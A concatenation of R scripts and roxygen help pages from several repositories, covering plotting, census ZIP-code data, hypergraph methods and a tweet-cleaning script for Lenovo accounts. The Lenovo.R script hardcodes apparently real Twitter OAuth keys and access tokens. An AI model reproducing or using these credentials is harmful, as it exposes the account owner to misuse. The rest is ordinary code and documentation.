selection_text_size = 1.1,
selection_text_adj = -0.5,
add_lowess_line = F,
lowess_line_color = rgb(0.7,0,0.9,1),
lowess_line_width = 1.5,
legend_pos = "topleft"){
res_merged <- merge(x = as.data.frame(res1),
y = as.data.frame(res2),
by = "row.names")
plot(x = res_merged$log2FoldChange.x,
y = res_merged$log2FoldChange.y,
main = "",
xlab = x_label,
ylab = y_label,
ylim = lims,
xlim = lims,
col = point_color,
pch = 19, cex = point_size)
if(add_lowess_line){
lines(lowess(x = res_merged$log2FoldChange.x, y = res_merged$log2FoldChange.y),
col = lowess_line_color, lwd = lowess_line_width)
}
abline(h=0, v=0, col="grey32")
abline(coef = c(0,1), col="grey32", lty=2)
if(!(is.null(selection_ids))){
selection_id_type <- paste0(selection_id_type, ".x")
selection_vector <- res_merged[selection_id_type][,1] %in% selection_ids
points(x = res_merged$log2FoldChange.x[selection_vector],
y = res_merged$log2FoldChange.y[selection_vector],
col = selection_color,
pch = 19, cex = selection_point_size)
if(selection_text_label){
text(x = res_merged$log2FoldChange.x[selection_vector],
y = res_merged$log2FoldChange.y[selection_vector],
labels = res_merged[selection_id_type][,1][selection_vector],
adj = c(0, selection_text_adj),
col = selection_color, cex = selection_text_size)
}
} else {
selection_vector <- FALSE
}
if(!(is.null(selection_legend)) & sum(selection_vector) > 0){
legend(legend_pos,
legend = c(selection_legend),
bg = "white",
col = c(selection_color), pch = 19, cex = 1)
}
}
|
id=1:nrow(test)
bayes.report=data.frame(id=id,pred=bayes.pred/length(bayes.es[[1]]))
write.csv(bayes.report,file="bayes.csv",row.names=F,col.names=F)
final.pred=data.frame(id=id,pred=apply(cbind(rpart.pred2,bayes.pred,ridge.pred),1,sum)/length(f3.es1[[1]]))
write.csv(final.pred,file="RpartLogitbayesRidge.std.csv",row.names=F,col.names=F)
| /code/Submission/final.run.R | no_license | hetong007/Credit | R | false | false | 344 | r | id=1:nrow(test)
bayes.report=data.frame(id=id,pred=bayes.pred/length(bayes.es[[1]]))
write.csv(bayes.report,file="bayes.csv",row.names=F,col.names=F)
final.pred=data.frame(id=id,pred=apply(cbind(rpart.pred2,bayes.pred,ridge.pred),1,sum)/length(f3.es1[[1]]))
write.csv(final.pred,file="RpartLogitbayesRidge.std.csv",row.names=F,col.names=F)
|
#load lubridate
library(lubridate)
#Download and unzip data
download.file("https://d396qusza40orc.cloudfront.net/exdata%2Fdata%2Fhousehold_power_consumption.zip", "data.zip")
unzip("data.zip")
#Read date
data <- read.table("household_power_consumption.txt", header=T, sep=";", na.strings = "?")
#Create Timestamp Variable
data$Timestamp <- dmy_hms(paste(as.character(data$Date), as.character(data$Time)))
#Reformat locale timestamp to allow for weekday in English
loc <- Sys.getlocale("LC_TIME")
Sys.setlocale("LC_TIME", "English")
#Subset data
subdata <- data[min(which(data$Date=="1/2/2007")):max((which(data$Date=="2/2/2007"))),]
####Create plot 4
png("plot4.png", width = 480, height = 480)
par(mfrow=c(2,2))
plot(subdata$Timestamp, subdata$Global_active_power, type="l", ylab="Global Active Power", xlab="")
plot(subdata$Timestamp, subdata$Voltage, type="l", xlab="datetime", ylab="Voltage")
plot(subdata$Timestamp, subdata$Sub_metering_1, type="l", ylab="Energy sub metering", xlab="")
lines(subdata$Timestamp, subdata$Sub_metering_2, col="red")
lines(subdata$Timestamp, subdata$Sub_metering_3, col="blue")
leg.text <- c("Sub_metering_1", "Sub_metering_2", "Sub_metering_3")
legend("topright", leg.text, lty=1, col=c("black", "red", "blue"), bty="n")
plot(subdata$Timestamp, subdata$Global_reactive_power, type="l", ylab="Global_reactive_power", xlab="datetime")
dev.off()
#reset locale
Sys.setlocale("LC_TIME", loc) | /plot4.R | no_license | mazzottidr/ExData_Plotting1 | R | false | false | 1,433 | r | #load lubridate
library(lubridate)
#Download and unzip data
download.file("https://d396qusza40orc.cloudfront.net/exdata%2Fdata%2Fhousehold_power_consumption.zip", "data.zip")
unzip("data.zip")
#Read date
data <- read.table("household_power_consumption.txt", header=T, sep=";", na.strings = "?")
#Create Timestamp Variable
data$Timestamp <- dmy_hms(paste(as.character(data$Date), as.character(data$Time)))
#Reformat locale timestamp to allow for weekday in English
loc <- Sys.getlocale("LC_TIME")
Sys.setlocale("LC_TIME", "English")
#Subset data
subdata <- data[min(which(data$Date=="1/2/2007")):max((which(data$Date=="2/2/2007"))),]
####Create plot 4
png("plot4.png", width = 480, height = 480)
par(mfrow=c(2,2))
plot(subdata$Timestamp, subdata$Global_active_power, type="l", ylab="Global Active Power", xlab="")
plot(subdata$Timestamp, subdata$Voltage, type="l", xlab="datetime", ylab="Voltage")
plot(subdata$Timestamp, subdata$Sub_metering_1, type="l", ylab="Energy sub metering", xlab="")
lines(subdata$Timestamp, subdata$Sub_metering_2, col="red")
lines(subdata$Timestamp, subdata$Sub_metering_3, col="blue")
leg.text <- c("Sub_metering_1", "Sub_metering_2", "Sub_metering_3")
legend("topright", leg.text, lty=1, col=c("black", "red", "blue"), bty="n")
plot(subdata$Timestamp, subdata$Global_reactive_power, type="l", ylab="Global_reactive_power", xlab="datetime")
dev.off()
#reset locale
Sys.setlocale("LC_TIME", loc) |
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/ScoreTest.R
\docType{methods}
\name{BGScoreTest}
\alias{BGScoreTest}
\alias{BGScoreTest,NanoStringGeoMxSet-method}
\alias{BGScoreTest,matrix-method}
\title{Testing for features above the background}
\usage{
BGScoreTest(object, ...)
\S4method{BGScoreTest}{NanoStringGeoMxSet}(
object,
split = FALSE,
adj = 1,
removeoutlier = FALSE,
useprior = FALSE
)
\S4method{BGScoreTest}{matrix}(
object,
BGmod,
adj = 1,
probenum,
removeoutlier = FALSE,
useprior = FALSE
)
}
\arguments{
\item{object}{count matrix with features in rows and samples in columns}
\item{...}{additional argument list that might be used}
\item{split}{indicator variable on whether it is for multiple slides (Yes, TRUE; No, FALSE)}
\item{adj}{adjustment factor for the number of feature in each gene, default =1 i.e.
each target only consists of one probe}
\item{removeoutlier}{whether to remove outlier}
\item{useprior}{whether to use the prior that the expression level of background follows a Beta distribution,
leading to a more conservative test}
\item{BGmod}{a list of sizefact, sizefact, and countmat}
\item{probenum}{a vector of numbers of probes in each gene}
}
\value{
a valid GeoMx S4 object including the following items
\itemize{
\item pvalues - Background score test pvalues, in featureData
\item scores - Background score test statistics, in featureData
}
if split is TRUE, a valid GeoMx S4 object including the following items
\itemize{
\item pvalues_XX - Background score test pvalues vector, column name (denoted as XX) the same as slide names, in featureData
\item scores_XX - Background score test statistics vector, column name (denoted as XX) the same as slide names, in featureData
}
a list of following items
\itemize{
\item pvalues - Background score test pvalues
\item scores - Background score test statistics
}
}
\description{
Testing for features above the background using Poisson background model as reference
Testing for features above the background using Poisson background model as reference
}
\examples{
data(demoData)
demoData <- fitPoisBG(demoData, size_scale = "sum")
demoData <- aggreprobe(demoData, use = "cor")
demoData <- BGScoreTest(demoData, adj = 1, useprior = FALSE)
demoData <- fitPoisBG(demoData, size_scale = "sum", groupvar = "slide name")
demoData <- BGScoreTest(demoData, adj = 1, useprior = TRUE, split = TRUE)
}
| /man/BGScoreTest-methods.Rd | permissive | JasonWReeves/GeoDiff | R | false | true | 2,455 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/ScoreTest.R
\docType{methods}
\name{BGScoreTest}
\alias{BGScoreTest}
\alias{BGScoreTest,NanoStringGeoMxSet-method}
\alias{BGScoreTest,matrix-method}
\title{Testing for features above the background}
\usage{
BGScoreTest(object, ...)
\S4method{BGScoreTest}{NanoStringGeoMxSet}(
object,
split = FALSE,
adj = 1,
removeoutlier = FALSE,
useprior = FALSE
)
\S4method{BGScoreTest}{matrix}(
object,
BGmod,
adj = 1,
probenum,
removeoutlier = FALSE,
useprior = FALSE
)
}
\arguments{
\item{object}{count matrix with features in rows and samples in columns}
\item{...}{additional argument list that might be used}
\item{split}{indicator variable on whether it is for multiple slides (Yes, TRUE; No, FALSE)}
\item{adj}{adjustment factor for the number of feature in each gene, default =1 i.e.
each target only consists of one probe}
\item{removeoutlier}{whether to remove outlier}
\item{useprior}{whether to use the prior that the expression level of background follows a Beta distribution,
leading to a more conservative test}
\item{BGmod}{a list of sizefact, sizefact, and countmat}
\item{probenum}{a vector of numbers of probes in each gene}
}
\value{
a valid GeoMx S4 object including the following items
\itemize{
\item pvalues - Background score test pvalues, in featureData
\item scores - Background score test statistics, in featureData
}
if split is TRUE, a valid GeoMx S4 object including the following items
\itemize{
\item pvalues_XX - Background score test pvalues vector, column name (denoted as XX) the same as slide names, in featureData
\item scores_XX - Background score test statistics vector, column name (denoted as XX) the same as slide names, in featureData
}
a list of following items
\itemize{
\item pvalues - Background score test pvalues
\item scores - Background score test statistics
}
}
\description{
Testing for features above the background using Poisson background model as reference
Testing for features above the background using Poisson background model as reference
}
\examples{
data(demoData)
demoData <- fitPoisBG(demoData, size_scale = "sum")
demoData <- aggreprobe(demoData, use = "cor")
demoData <- BGScoreTest(demoData, adj = 1, useprior = FALSE)
demoData <- fitPoisBG(demoData, size_scale = "sum", groupvar = "slide name")
demoData <- BGScoreTest(demoData, adj = 1, useprior = TRUE, split = TRUE)
}
|
library(twitteR)
setup_twitter_oauth('v4G2SxDIGAdgJonVdpgoXmdZQ','cM58GB3vVuuNscnAJ8uC7UwVpwHHE59WWnBrrV3kyUzY1W8Ak6','146841885-jaZbsQjJrHE6maZhn5nGC0UFNPP6rrULd1DB6C39','56tewGvrNgtcDExLmXGc94dyWWsho14umruVKGyENuW58')
lenovo_health <- searchTwitteR("LenovoHealthUS+@LenovoHealthUS",n=10000,lang = "en")
lenovo_na <- searchTwitter("@LenovoChannelNA",n=10000)
lenovo_health_df <- do.call("rbind", lapply(lenovo_health,as.data.frame))
lenovo_health_df <- subset(lenovo_health_df,select = c(text))
lenovo_na_df <- do.call("rbind",lapply(lenovo_na,as.data.frame))
lenovo_na_df <- subset(lenovo_na_df,select=c(text))
# Cleaning All the Tweets
lenovo_health_df$text <- gsub("[[:blank:]]","",lenovo_health_df$text)
lenovo_health_df$text <- gsub("[[:punct:]]","",lenovo_health_df$text)
lenovo_health_df$text <- gsub("[[:ctrl:]]","",lenovo_health_df$text)
lenovo_health_df$text <- gsub("[[:digit:]]","",lenovo_health_df$text)
lenovo_health_df$text = gsub("(RT|via)((?:\\b\\W*@\\w+)+)", " ", lenovo_health_df$text)
lenovo_health_df$text = gsub("@\\w+", "", lenovo_health_df$text)
lenovo_health_df$text = gsub("http\\w+", "", lenovo_health_df$text)
lenovo_health_df$text = gsub("RT", "", lenovo_health_df$text)
lenovo_health_df$text = gsub("Lenovo", "", lenovo_health_df$text)
lenovo_health_df$text = gsub("HealthUS", "", lenovo_health_df$text)
lenovo_na_df$text <- gsub("[[:blank:]]","",lenovo_na_df$text)
lenovo_na_df$text <- gsub("[[:punct:]]","",lenovo_na_df$text)
lenovo_na_df$text <- gsub("[[:ctrl:]]","",lenovo_na_df$text)
lenovo_na_df$text <- gsub("[[:digit:]]","",lenovo_na_df$text)
lenovo_na_df$text = gsub("(RT|via)((?:\\b\\W*@\\w+)+)", " ", lenovo_na_df$text)
lenovo_na_df$text = gsub("@\\w+", "", lenovo_na_df$text)
lenovo_na_df$text = gsub("http\\w+", "", lenovo_na_df$text)
lenovo_na_df$text = gsub("RT", "", lenovo_na_df$text)
lenovo_na_df$text = gsub("Lenovo", "", lenovo_na_df$text)
lenovo_na_df$text = gsub("HealthUS", "", lenovo_na_df$text)
lenovo_na_df$text = gsub("ChannelNA", "", lenovo_na_df$text)
lenovo_health_df["DuplicatedTweets"] <- duplicated(lenovo_health_df$text)
lenovo_health_df <- subset(lenovo_health_df,lenovo_health_df$DuplicatedTweets=="FALSE")
lenovo_health_df <- subset(lenovo_health_df,select = c(text))
lenovo_na_df["DuplicatedTweets"] <- duplicated(lenovo_na_df)
lenovo_na_df <- subset(lenovo_na_df,lenovo_na_df$DuplicatedTweets=="FALSE")
lenovo_na_df <- subset(lenovo_na_df,select = c(text))
| /Lenovo.R | no_license | tanvibobde/Sentiment-Analysis | R | false | false | 2,438 | r | library(twitteR)
setup_twitter_oauth('v4G2SxDIGAdgJonVdpgoXmdZQ','cM58GB3vVuuNscnAJ8uC7UwVpwHHE59WWnBrrV3kyUzY1W8Ak6','146841885-jaZbsQjJrHE6maZhn5nGC0UFNPP6rrULd1DB6C39','56tewGvrNgtcDExLmXGc94dyWWsho14umruVKGyENuW58')
lenovo_health <- searchTwitteR("LenovoHealthUS+@LenovoHealthUS",n=10000,lang = "en")
lenovo_na <- searchTwitter("@LenovoChannelNA",n=10000)
lenovo_health_df <- do.call("rbind", lapply(lenovo_health,as.data.frame))
lenovo_health_df <- subset(lenovo_health_df,select = c(text))
lenovo_na_df <- do.call("rbind",lapply(lenovo_na,as.data.frame))
lenovo_na_df <- subset(lenovo_na_df,select=c(text))
# Cleaning All the Tweets
lenovo_health_df$text <- gsub("[[:blank:]]","",lenovo_health_df$text)
lenovo_health_df$text <- gsub("[[:punct:]]","",lenovo_health_df$text)
lenovo_health_df$text <- gsub("[[:ctrl:]]","",lenovo_health_df$text)
lenovo_health_df$text <- gsub("[[:digit:]]","",lenovo_health_df$text)
lenovo_health_df$text = gsub("(RT|via)((?:\\b\\W*@\\w+)+)", " ", lenovo_health_df$text)
lenovo_health_df$text = gsub("@\\w+", "", lenovo_health_df$text)
lenovo_health_df$text = gsub("http\\w+", "", lenovo_health_df$text)
lenovo_health_df$text = gsub("RT", "", lenovo_health_df$text)
lenovo_health_df$text = gsub("Lenovo", "", lenovo_health_df$text)
lenovo_health_df$text = gsub("HealthUS", "", lenovo_health_df$text)
lenovo_na_df$text <- gsub("[[:blank:]]","",lenovo_na_df$text)
lenovo_na_df$text <- gsub("[[:punct:]]","",lenovo_na_df$text)
lenovo_na_df$text <- gsub("[[:ctrl:]]","",lenovo_na_df$text)
lenovo_na_df$text <- gsub("[[:digit:]]","",lenovo_na_df$text)
lenovo_na_df$text = gsub("(RT|via)((?:\\b\\W*@\\w+)+)", " ", lenovo_na_df$text)
lenovo_na_df$text = gsub("@\\w+", "", lenovo_na_df$text)
lenovo_na_df$text = gsub("http\\w+", "", lenovo_na_df$text)
lenovo_na_df$text = gsub("RT", "", lenovo_na_df$text)
lenovo_na_df$text = gsub("Lenovo", "", lenovo_na_df$text)
lenovo_na_df$text = gsub("HealthUS", "", lenovo_na_df$text)
lenovo_na_df$text = gsub("ChannelNA", "", lenovo_na_df$text)
lenovo_health_df["DuplicatedTweets"] <- duplicated(lenovo_health_df$text)
lenovo_health_df <- subset(lenovo_health_df,lenovo_health_df$DuplicatedTweets=="FALSE")
lenovo_health_df <- subset(lenovo_health_df,select = c(text))
lenovo_na_df["DuplicatedTweets"] <- duplicated(lenovo_na_df)
lenovo_na_df <- subset(lenovo_na_df,lenovo_na_df$DuplicatedTweets=="FALSE")
lenovo_na_df <- subset(lenovo_na_df,select = c(text))
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/NCMCVh.R
\name{NCMCVh}
\alias{NCMCVh}
\title{NCMCVh}
\usage{
NCMCVh(Y, u, h, ktype = "gaussian")
}
\arguments{
\item{Y}{the observation, p * n matrix}
\item{u}{the condition, it is a vector, one-dimensional array or
one-dimensional row(column) matrix}
\item{h}{the bandwidth, scalar}
\item{ktype}{the kernel type, can be "gaussian", "epanech", "triweight",
"biweight", "tricube", "triangular" and "cosine",
the default of ktype is "gaussian".}
}
\value{
the value of cross validation function
}
\description{
This routine calculate the cross validation value using NCM method.
}
\examples{
\dontrun{
data(u)
data(LowerBoundary)
data(Ystd_LC)
upper <- 1
h_grid <- matrix(seq(0.05, upper, length.out = 100), nrow = 100)
cv <- apply(h_grid, 1, NCMCVh, Y = Ystd_LC, u = u)
plot(h_grid,cv, type = 'l', xlab = "Bandwidth", ylab = "CV Values", col = "blue")
# select the optimal bandwidth for diagonal entries of covariance
hncm <- optimise(NCMCVh, c(LowerBoundary, upper), tol = 1e-6,
Y = Ystd_LC, u = u)
abline(v = hncm$minimum, col="red")
}
}
\seealso{
\code{\link{CVLL}}
}
| /man/NCMCVh.Rd | no_license | Jieli12/llfdr | R | false | true | 1,171 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/NCMCVh.R
\name{NCMCVh}
\alias{NCMCVh}
\title{NCMCVh}
\usage{
NCMCVh(Y, u, h, ktype = "gaussian")
}
\arguments{
\item{Y}{the observation, p * n matrix}
\item{u}{the condition, it is a vector, one-dimensional array or
one-dimensional row(column) matrix}
\item{h}{the bandwidth, scalar}
\item{ktype}{the kernel type, can be "gaussian", "epanech", "triweight",
"biweight", "tricube", "triangular" and "cosine",
the default of ktype is "gaussian".}
}
\value{
the value of cross validation function
}
\description{
This routine calculate the cross validation value using NCM method.
}
\examples{
\dontrun{
data(u)
data(LowerBoundary)
data(Ystd_LC)
upper <- 1
h_grid <- matrix(seq(0.05, upper, length.out = 100), nrow = 100)
cv <- apply(h_grid, 1, NCMCVh, Y = Ystd_LC, u = u)
plot(h_grid,cv, type = 'l', xlab = "Bandwidth", ylab = "CV Values", col = "blue")
# select the optimal bandwidth for diagonal entries of covariance
hncm <- optimise(NCMCVh, c(LowerBoundary, upper), tol = 1e-6,
Y = Ystd_LC, u = u)
abline(v = hncm$minimum, col="red")
}
}
\seealso{
\code{\link{CVLL}}
}
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/zipWRUdata.R
\docType{data}
\name{zip_all_census2}
\alias{zip_all_census2}
\title{WRU formatted racial demographics ZIP code data}
\format{
A data frame with 297,351 rows and 16 variables:
\describe{
\item{state_name}{State's name, all capitalized}
\item{zcta5}{The string padded 5 digit ZIP code}
\item{total_pop}{Total population for the ZIP code}
\item{q_whi}{The population for non-hispanic whites}
\item{q_bla}{The population for non-hispanic blacks}
\item{q_his}{The population for hispanics}
\item{q_asi}{The population for non-hispanic Asians and pacific islanders}
\item{q_oth}{The population for non-hispanic all other races}
\item{r_whi}{The proportion of the non-hispanic white population that lives within a ZIP code relative to the given state}
\item{r_bla}{The proportion of the non-hispanic black population that lives within a ZIP code relative to the given state}
\item{r_his}{The proportion of the hispanic population that lives within a ZIP code relative to the given state}
\item{r_asi}{The proportion of the non-hispanic asian and pacific islander population that lives within a ZIP code relative to the given state}
\item{r_oth}{The proportion of the non-hispanic other population that lives within a ZIP code relative to the given state}
\item{type}{The source of the data to be specified for prediction purposes. Takes either the values of census or acs}
\item{year}{The year for the data. The Census data is from 2010, and the acs data runs from 2011 to 2018.}
\item{state_po}{The state postal code.}
}
}
\source{
U.S. Census Bureau. (2011--2018). 2011-2018 American Community Survey (ACS) 5-year Detailed ZCTA Level Data. Geographic Level 860,
Tables: B01001C -- B01001I. Public Use Microdata Samples \link{JSON Data file}. Retrieved from (see sources_dataframe for links).
}
\usage{
zip_all_census2
}
\description{
A dataset containing the number of each racial demographic in U.S. ZIP codes for the purpose of running the wru BISG package. Includes data
from the Census (2010) and every 5 year ACS up to 2018. Additionally, presents data in crosswalk format such that the data can be run by
state.
}
\keyword{datasets}
| /zipWRUext2/man/zip_all_census2.Rd | no_license | ckann10/zipWRUext | R | false | true | 2,228 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/zipWRUdata.R
\docType{data}
\name{zip_all_census2}
\alias{zip_all_census2}
\title{WRU formatted racial demographics ZIP code data}
\format{
A data frame with 297,351 rows and 16 variables:
\describe{
\item{state_name}{State's name, all capitalized}
\item{zcta5}{The string padded 5 digit ZIP code}
\item{total_pop}{Total population for the ZIP code}
\item{q_whi}{The population for non-hispanic whites}
\item{q_bla}{The population for non-hispanic blacks}
\item{q_his}{The population for hispanics}
\item{q_asi}{The population for non-hispanic Asians and pacific islanders}
\item{q_oth}{The population for non-hispanic all other races}
\item{r_whi}{The proportion of the non-hispanic white population that lives within a ZIP code relative to the given state}
\item{r_bla}{The proportion of the non-hispanic black population that lives within a ZIP code relative to the given state}
\item{r_his}{The proportion of the hispanic population that lives within a ZIP code relative to the given state}
\item{r_asi}{The proportion of the non-hispanic asian and pacific islander population that lives within a ZIP code relative to the given state}
\item{r_oth}{The proportion of the non-hispanic other population that lives within a ZIP code relative to the given state}
\item{type}{The source of the data to be specified for prediction purposes. Takes either the values of census or acs}
\item{year}{The year for the data. The Census data is from 2010, and the acs data runs from 2011 to 2018.}
\item{state_po}{The state postal code.}
}
}
\source{
U.S. Census Bureau. (2011--2018). 2011-2018 American Community Survey (ACS) 5-year Detailed ZCTA Level Data. Geographic Level 860,
Tables: B01001C -- B01001I. Public Use Microdata Samples \link{JSON Data file}. Retrieved from (see sources_dataframe for links).
}
\usage{
zip_all_census2
}
\description{
A dataset containing the number of each racial demographic in U.S. ZIP codes for the purpose of running the wru BISG package. Includes data
from the Census (2010) and every 5 year ACS up to 2018. Additionally, presents data in crosswalk format such that the data can be run by
state.
}
\keyword{datasets}
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/color.r
\name{can_change_color}
\alias{can_change_color}
\title{does the terminal supports colors and can change their definitions}
\usage{
can_change_color()
}
\value{
TRUE iff only it can
}
\description{
Lots of terminals do not support it.
Setting TERM=xterm-256color in terminology on ubuntu seem to enable
support for it (on terminology and gnome-terminal)
}
\seealso{
Other color: \code{\link{COLOR_PAIR}}, \code{\link{COLOR}},
\code{\link{PAIR_NUMBER}},
\code{\link{assume_default_colors}},
\code{\link{color_content}}, \code{\link{color_off}},
\code{\link{color_on}}, \code{\link{has_colors}},
\code{\link{init_pair}}, \code{\link{pair_content}},
\code{\link{start_color}},
\code{\link{use_default_colors}}
}
| /Rcurses/man/can_change_color.Rd | no_license | kforner/rcurses | R | false | true | 813 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/color.r
\name{can_change_color}
\alias{can_change_color}
\title{does the terminal supports colors and can change their definitions}
\usage{
can_change_color()
}
\value{
TRUE iff only it can
}
\description{
Lots of terminals do not support it.
Setting TERM=xterm-256color in terminology on ubuntu seem to enable
support for it (on terminology and gnome-terminal)
}
\seealso{
Other color: \code{\link{COLOR_PAIR}}, \code{\link{COLOR}},
\code{\link{PAIR_NUMBER}},
\code{\link{assume_default_colors}},
\code{\link{color_content}}, \code{\link{color_off}},
\code{\link{color_on}}, \code{\link{has_colors}},
\code{\link{init_pair}}, \code{\link{pair_content}},
\code{\link{start_color}},
\code{\link{use_default_colors}}
}
|
setMethod("initialize", "Hypergraph", function(.Object, nodes=character(), hyperedges=list()) {
## Create a new hypergraph instance.
##
## nodes: character vector of node names
##
## hyperedges: a list of character vectors describing subsets of the nodes.
##
.Object@nodes = nodes
hypergraph:::checkValidHyperedges(hyperedges, nodes)
hyperedges <- addDefaultHyperedgeLabels(hyperedges)
.Object@hyperedges = hyperedges
.Object
})
Hypergraph <- function(nodes, hyperedges) {
## Convenience function to create Hypergraph instances
new("Hypergraph", nodes=nodes, hyperedges=hyperedges)
}
checkValidHyperedges <- function(hyperedges, nnodes) {
goodHyperedges <- unlist(lapply(hyperedges, is, "Hyperedge"))
if (!all(goodHyperedges))
stop("hyperedge list elements must be instances of the Hyperedge class.")
hyperedgeSet <- unlist(lapply(hyperedges, nodes))
unknownNodes <- !(hyperedgeSet %in% nnodes)
if (any(unknownNodes)) {
unknownNodes <- hyperedgeSet[unknownNodes]
msg <- paste("The hyperedge list is not valid because it",
"specifies nodes not in the node vector:")
msg <- paste(msg, paste(dQuote(unknownNodes), collapse=" "), sep="\n")
stop(msg)
}
TRUE
}
addDefaultHyperedgeLabels <- function(hyperedges) {
for (i in seq_len(length(hyperedges))) {
hEdge <- hyperedges[[i]]
lab <- label(hEdge)
if (is.null(lab) || length(lab) < 1 || lab == "") {
lab <- as.character(i)
label(hEdge) <- lab
hyperedges[[i]] <- hEdge
}
}
hyperedges
}
setMethod("hyperedges", signature(.Object="Hypergraph"),
function(.Object) .Object@hyperedges)
setMethod("hyperedgeLabels", signature(.Object="Hypergraph"),
function(.Object) sapply(.Object@hyperedges, label))
setMethod(graph::nodes, signature(object="Hypergraph"), function(object)
object@nodes)
setMethod(graph::numNodes, signature(object="Hypergraph"),
function(object) length(object@nodes))
setMethod("inciMat", signature(.Object="Hypergraph"),
function(.Object) {
nds <- nodes(.Object)
hEdgeList <- hyperedges(.Object)
createInciMat(nds, hEdgeList)
})
setMethod("inciMat2HG", signature(.Object="matrix"),
function(.Object){
rn <- rownames(.Object)
hgList <- apply(.Object, 2, function(x){
names(which(x == 1))
})
heList <- l2hel(hgList)
hg <- Hypergraph(rn, heList)
hg
})
createInciMat <- function(nodes, edgeList) {
inciMat <- matrix(0, nrow=length(nodes), ncol=length(edgeList))
for (j in 1:length(edgeList)) {
col <- as.numeric(nodes %in% nodes(edgeList[[j]]))
inciMat[, j] <- col
}
rownames(inciMat) <- nodes
colnames(inciMat) <- sapply(edgeList, label)
inciMat
}
setMethod("toGraphNEL", signature(.Object="Hypergraph"),
function(.Object) {
hEdges <- hyperedges(.Object)
hEdgeNames <- names(hEdges)
if (is.null(hEdgeNames))
hEdgeNames <- as.character(1:length(hEdges))
if (any(hEdgeNames %in% nodes(.Object)))
stop("hyperedge names must be distinct from node names")
bpgNodes <- c(nodes(.Object), hEdgeNames)
heEdgeL <- lapply(hEdges, function(x) {
list(edges=match(nodes(x), bpgNodes), weights=rep(1, length(nodes(x))))})
names(heEdgeL) <- hEdgeNames
hnEdgeL <- vector(mode="list", length=length(nodes(.Object)))
names(hnEdgeL) <- nodes(.Object)
for (i in 1:length(hEdges)) {
he <- hEdges[[i]]
heNode <- hEdgeNames[i]
heNodeIndex <- which(heNode == bpgNodes)
for (n in nodes(he))
hnEdgeL[[n]] <- append(hnEdgeL[[n]], heNodeIndex)
}
hnEdgeL <- lapply(hnEdgeL, function(x) {
list(edges=x, weights=rep(1, length(x)))})
bpgEdgeL <- c(heEdgeL, hnEdgeL)
new("graphNEL", bpgNodes, bpgEdgeL)
})
| /HypergraphEvaluations/bioconductor/R/methods-Hypergraph.R | no_license | roscoe-casita/uoregon-thesis | R | false | false | 4,319 | r | setMethod("initialize", "Hypergraph", function(.Object, nodes=character(), hyperedges=list()) {
## Create a new hypergraph instance.
##
## nodes: character vector of node names
##
## hyperedges: a list of character vectors describing subsets of the nodes.
##
.Object@nodes = nodes
hypergraph:::checkValidHyperedges(hyperedges, nodes)
hyperedges <- addDefaultHyperedgeLabels(hyperedges)
.Object@hyperedges = hyperedges
.Object
})
Hypergraph <- function(nodes, hyperedges) {
## Convenience function to create Hypergraph instances
new("Hypergraph", nodes=nodes, hyperedges=hyperedges)
}
checkValidHyperedges <- function(hyperedges, nnodes) {
goodHyperedges <- unlist(lapply(hyperedges, is, "Hyperedge"))
if (!all(goodHyperedges))
stop("hyperedge list elements must be instances of the Hyperedge class.")
hyperedgeSet <- unlist(lapply(hyperedges, nodes))
unknownNodes <- !(hyperedgeSet %in% nnodes)
if (any(unknownNodes)) {
unknownNodes <- hyperedgeSet[unknownNodes]
msg <- paste("The hyperedge list is not valid because it",
"specifies nodes not in the node vector:")
msg <- paste(msg, paste(dQuote(unknownNodes), collapse=" "), sep="\n")
stop(msg)
}
TRUE
}
addDefaultHyperedgeLabels <- function(hyperedges) {
for (i in seq_len(length(hyperedges))) {
hEdge <- hyperedges[[i]]
lab <- label(hEdge)
if (is.null(lab) || length(lab) < 1 || lab == "") {
lab <- as.character(i)
label(hEdge) <- lab
hyperedges[[i]] <- hEdge
}
}
hyperedges
}
setMethod("hyperedges", signature(.Object="Hypergraph"),
function(.Object) .Object@hyperedges)
setMethod("hyperedgeLabels", signature(.Object="Hypergraph"),
function(.Object) sapply(.Object@hyperedges, label))
setMethod(graph::nodes, signature(object="Hypergraph"), function(object)
object@nodes)
setMethod(graph::numNodes, signature(object="Hypergraph"),
function(object) length(object@nodes))
setMethod("inciMat", signature(.Object="Hypergraph"),
function(.Object) {
nds <- nodes(.Object)
hEdgeList <- hyperedges(.Object)
createInciMat(nds, hEdgeList)
})
setMethod("inciMat2HG", signature(.Object="matrix"),
function(.Object){
rn <- rownames(.Object)
hgList <- apply(.Object, 2, function(x){
names(which(x == 1))
})
heList <- l2hel(hgList)
hg <- Hypergraph(rn, heList)
hg
})
createInciMat <- function(nodes, edgeList) {
inciMat <- matrix(0, nrow=length(nodes), ncol=length(edgeList))
for (j in 1:length(edgeList)) {
col <- as.numeric(nodes %in% nodes(edgeList[[j]]))
inciMat[, j] <- col
}
rownames(inciMat) <- nodes
colnames(inciMat) <- sapply(edgeList, label)
inciMat
}
setMethod("toGraphNEL", signature(.Object="Hypergraph"),
function(.Object) {
hEdges <- hyperedges(.Object)
hEdgeNames <- names(hEdges)
if (is.null(hEdgeNames))
hEdgeNames <- as.character(1:length(hEdges))
if (any(hEdgeNames %in% nodes(.Object)))
stop("hyperedge names must be distinct from node names")
bpgNodes <- c(nodes(.Object), hEdgeNames)
heEdgeL <- lapply(hEdges, function(x) {
list(edges=match(nodes(x), bpgNodes), weights=rep(1, length(nodes(x))))})
names(heEdgeL) <- hEdgeNames
hnEdgeL <- vector(mode="list", length=length(nodes(.Object)))
names(hnEdgeL) <- nodes(.Object)
for (i in 1:length(hEdges)) {
he <- hEdges[[i]]
heNode <- hEdgeNames[i]
heNodeIndex <- which(heNode == bpgNodes)
for (n in nodes(he))
hnEdgeL[[n]] <- append(hnEdgeL[[n]], heNodeIndex)
}
hnEdgeL <- lapply(hnEdgeL, function(x) {
list(edges=x, weights=rep(1, length(x)))})
bpgEdgeL <- c(heEdgeL, hnEdgeL)
new("graphNEL", bpgNodes, bpgEdgeL)
})
|
### \author Kostas Lagogiannis 2019-04-17
## Figure 4 of manuscript - Clustering of capture bouts
## This is a mixture of two Gaussians Model for Clustering Capture speed (fast/ slow), based on Speed & Distance from Prey
